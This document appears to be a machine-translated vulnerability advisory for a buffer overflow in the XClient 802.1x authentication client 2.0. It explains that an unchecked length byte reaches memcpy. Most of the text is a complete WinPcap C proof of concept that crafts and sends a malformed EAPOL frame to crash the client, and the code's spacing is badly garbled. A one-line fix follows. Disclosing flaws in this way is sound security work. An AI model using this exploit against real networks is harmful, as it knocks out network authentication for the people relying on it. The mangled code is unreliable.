XClient 802.1x client 2.0 Remote Buffer Overflow

XClient 802.1x client 2.0 is a commonly used H3C802.1x protocol authentication client in universities. Because the software does not determine the length field in the received data packet, the buffer overflow occurs, A Denial-of-Service vulnerability is generated. The program extracts 17th bytes of received data. After the symbol is extended, 4 is subtracted. Finally, the Code is directly transmitted to the memcpy function as the length, if the number of 17th bytes is any number between 0 and 3, the length field of the memcpy function will eventually be very large, resulting in a buffer overflow vulnerability proof: poc code is as follows: # include "stdafx. h "# include <pcap. h> # pragma comment (lib, "wpcap. lib ") int _ tmain (int argc, _ TCHAR * argv []) {pcap_t * fp; char errbuf [PCAP_ERRBUF_SIZE]; u_char packet [1000]; pcap_if_t * alldevs; /* Ch Eck the validity of the command line */if (pcap_findalldevs (& alldevs, errbuf) =-1) {fprintf (stderr, "Error in pcap_findalldevs: % s \ n ", errbuf); exit (1);} pcap_if_t * d; int I = 0;/* Print the list */for (d = alldevs; d = d-> next) {printf ("% d. % s ", ++ I, d-> name); if (d-> description) printf (" (% s) \ n ", d-> description ); elseprintf ("(No description available) \ n");}/* select the corresponding Nic */if (fp = pcap_open_live (alldevs-> n Ame, // name of the device65536, // portion of the packet to capture. it doesn't matter in this case 1, // promiscuous mode (nonzero means promiscuous) 1000, // read timeouterrbuf // error buffer) = NULL) {fprintf (stderr, "\ nUnable to open the adapter. % s is not supported by WinPcap \ n ", argv [1]); return 2;} memset (packet, 0, 1000 ); /* target machine mac address */packet [0] = 0x00; packet [1] = 0x0C; packet [2] = 0x29; p Acket [3] = 0x0F; packet [4] = 0x63; packet [5] = 0xDD;/* set mac source to 2: 2: 2: 2: 2: 2 */packet [6] = 2; packet [7] = 2; packet [8] = 2; packet [9] = 2; packet [10] = 2; packet [11] = 2;/* protocol header */packet [12] = 0x88; packet [13] = 0x8e; packet [14] = 0x01; packet [15] = 0x01; packet [0x12] = 0x0A; // It Must Be 0x0Apacket [23] = '#' + 1; // This is not equal to '#' packet [17] = 0; // length information/* Send down the packet */if (pcap_sendpacket (fp, // Adapterpacket ,/ /Buffer with the packet1000 // size )! = 0) {fprintf (stderr, "\ nError sending the packet: % s \ n", pcap_geterr (fp); return 3;} Sleep (100 ); if (pcap_sendpacket (fp, // Adapterpacket, // buffer with the packet1000 // size )! = 0) {fprintf (stderr, "\ nError sending the packet: % s \ n", pcap_geterr (fp); return 3;} pcap_close (fp); return 0 ;} attack Process: start running, enter user information, and click Start authentication to run the attack code. Then, the program exits.Solution:

Add length verification to filter Invalid Data